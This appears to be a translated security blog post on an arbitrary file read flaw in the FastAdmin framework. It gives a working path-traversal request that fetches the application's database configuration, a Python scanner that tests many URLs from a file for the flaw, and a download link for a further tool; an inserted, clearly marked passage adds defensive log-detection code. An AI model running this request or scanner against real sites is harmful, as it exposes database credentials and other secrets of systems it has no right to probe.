Preface
FastAdmin is a rapid backend development framework built on ThinkPHP and Bootstrap. It is released under the Apache 2.0 open-source license, is free to use with no restriction on commercial use, and is currently widely deployed as the admin backend in applications across many industries.
Vulnerability description
FastAdmin is a rapid-development backend management framework based on ThinkPHP and Bootstrap. The FastAdmin framework contains a file read vulnerability: an attacker who exploits it can obtain sensitive system information.
Vulnerability reproduction
1. Send the following request to read the file
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
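A defender-side check for the request shown above, added here as an example that is not part of the original post or of FastAdmin's own code: it scans constructed access-log lines for the /index/ajax/lang endpoint, undoes nested URL-encoding, and flags every lang value that falls outside an assumed letters/digits/hyphen allowlist (the same check a patched endpoint would apply before building a file path). The log format, the allowlist pattern and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jun/2024:12:00:01 +0000] "GET /index/ajax/lang?lang=zh-cn HTTP/1.1" 200 812
10.0.0.9 - - [10/Jun/2024:12:00:02 +0000] "GET /index/ajax/lang?lang=../../application/database HTTP/1.1" 200 1937
10.0.0.9 - - [10/Jun/2024:12:00:03 +0000] "GET /index/ajax/lang?lang=..%2F..%2Fapplication%2Fdatabase HTTP/1.1" 200 1937
10.0.0.9 - - [10/Jun/2024:12:00:04 +0000] "GET /index/ajax/lang?lang=%252e%252e/application/config HTTP/1.1" 200 1400
10.0.0.7 - - [10/Jun/2024:12:00:05 +0000] "GET /index/ajax/lang?lang=en HTTP/1.1" 200 790
"""

# Assumed combined-log layout: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed allowlist for a language code: letters, digits and hyphen only (e.g. zh-cn, en).
LANG_OK = re.compile(r'^[a-z0-9-]{1,16}$', re.IGNORECASE)


def fully_decode(value, rounds=3):
    """Strip up to `rounds` layers of URL-encoding so ..%2F and %252e are seen as-is."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_lang_safe(lang):
    """Allowlist check a fixed endpoint would apply before touching the filesystem."""
    return LANG_OK.fullmatch(fully_decode(lang)) is not None


def find_traversal_attempts(log_text):
    """Return (ip, status, decoded lang) for every lang value that fails the allowlist."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('target'))
        if parts.path.rstrip('/') != '/index/ajax/lang':
            continue
        # parse_qs removes one encoding layer; fully_decode handles double-encoding.
        for lang in parse_qs(parts.query, keep_blank_values=True).get('lang', []):
            if not is_lang_safe(lang):
                hits.append((m.group('ip'), m.group('status'), fully_decode(lang)))
    return hits
```

A 200 status on a flagged line is the signal that the traversal was served rather than rejected, which is what separates a probe from a successful read in this log.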
Scanner tool
python3 fastadmin.py -uf 1.txt
Script:
# -*- coding: utf-8 -*-
import argparse
import requests

# Silence the InsecureRequestWarning raised because verify=False is used below.
requests.packages.urllib3.disable_warnings()


class CONFIG:
    def __init__(self):
        self.headers = {
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
            'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-US;q=0.7,ja;q=0.6',
            "Content-Type": "application/x-www-form-urlencoded",
            'Connection': 'keep-alive',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',
        }
        # Same traversal path as in the reproduction request above.
        self.api_path = "/index/ajax/lang?lang=../../application/database"


def poc_scan(url):
    try:
        print("请求的url:", url)
        # Note: the reproduction above uses GET; this script sends POST, as in the original.
        response = requests.post(url + CONFIG().api_path, headers=CONFIG().headers, timeout=5, verify=False)
        # The database config file contains "define", so its presence marks a successful read.
        if b"define" in response.content:
            print("url:", url, "存在该漏洞")
        else:
            print("url:", url, "不存在该漏洞")
    except Exception as e:
        print("url:", url, "报错了,自行验证漏洞!")
        # print(e)


def args_root():
    try:
        parser = argparse.ArgumentParser(description='eeeeee input')
        parser.add_argument('-u', "--url", dest='url', default=False, help='指定url')
        parser.add_argument('-uf', "--url-file", dest='url_file', default=False, help='指定url文件')
        args = parser.parse_args()
        return args
    except Exception as e:
        print(e)


if __name__ == "__main__":
    argss = args_root()
    if argss.url:
        poc_scan(argss.url)
    if argss.url_file:
        with open(argss.url_file, "r") as file:
            # Skip blank lines so an empty trailing line is not treated as a URL.
            for i in file.read().split("\n"):
                i = i.strip()
                if i:
                    poc_scan(i)
FastAdmin tool:
Link: https://pan.baidu.com/s/1Zm54ZHup3tfpxOqUFUr6pw?pwd=n8pw
Extraction code: n8pw
Originally published on the WeChat public account 安全笔记: Fastadmin framework arbitrary file read vulnerability (with scanner tool)